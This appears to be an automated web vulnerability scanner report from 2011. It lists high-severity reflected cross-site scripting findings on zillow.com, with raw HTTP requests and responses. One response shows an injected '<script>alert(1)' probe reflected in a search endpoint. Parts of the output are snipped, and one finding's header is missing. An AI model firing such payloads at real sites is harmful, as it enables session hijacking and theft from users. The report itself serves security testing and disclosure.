1. Cross-site scripting (reflected)
1.1. http://www.zillow.com/search/GetResults.htm [att parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://www.zillow.com |
Path: | /search/GetResults.htm |
GET /search/GetResults.htm Host: www.zillow.com Proxy-Connection: keep-alive Referer: http://www.zillow.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServertomcat_pool_0 |
HTTP/1.1 200 OK Date: Sat, 12 Mar 2011 23:01:04 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat X-Internal-Host: 209 X-Requested-Session: FD819F6E808EF84BC115 Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Type: text/plain;charset=UTF-8 Set-Cookie: abtest=1|BotoxDefaultView Set-Cookie: search=4|1300057263986 Via: 1.1 www.zillow.com Vary: Accept-Encoding,User Content-Length: 1061 { "list":{ "page":1, "numPages":0, "binCounts":SearchBi 0,0,0,0,0, 0,0,0,0,0, 0,0,0,0,0, 0) , "pagination":"<ul class=\"pagination sprited\"> <li> <span class=\"arrow prev\"><a onc ...[SNIP]... <div id=\"applied-summary\"> keywords: 6e3cb<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.zillow.com |
Path: | /vstatic/8a5516d0088 |
GET /vstatic/8a5516d0088 Host: www.zillow.com Proxy-Connection: keep-alive Referer: http://www.zillow.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServertomcat_pool_0 |
HTTP/1.1 404 Not Found Date: Sat, 12 Mar 2011 23:01:52 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat X-Internal-Host: 209 X-Requested-Session: FD819F6E808EF84BC115 Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache X-Frame-Options: deny Content-Type: text/html;charset=UTF-8 Set-Cookie: abtest=1|BotoxDefaultView Set-Cookie: abtest=1|BotoxDefaultView Via: 1.1 www.zillow.com Vary: User-Agent,Accept Content-Length: 26854 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <meta charset="utf-8" /> <meta content="IE=EmulateIE7" http-equiv="X-UA-Comp ...[SNIP]... alytic({ "key": "comscore", "callback": function () { COMSCORE.beacon({ "c1": 2, "c2": "6036206", "c3": "", "c4": "www.zillow.com/static "c5": "", "c6": "", "c15":"" }); } }); } catch (err) {} }); // --> ...[SNIP]... |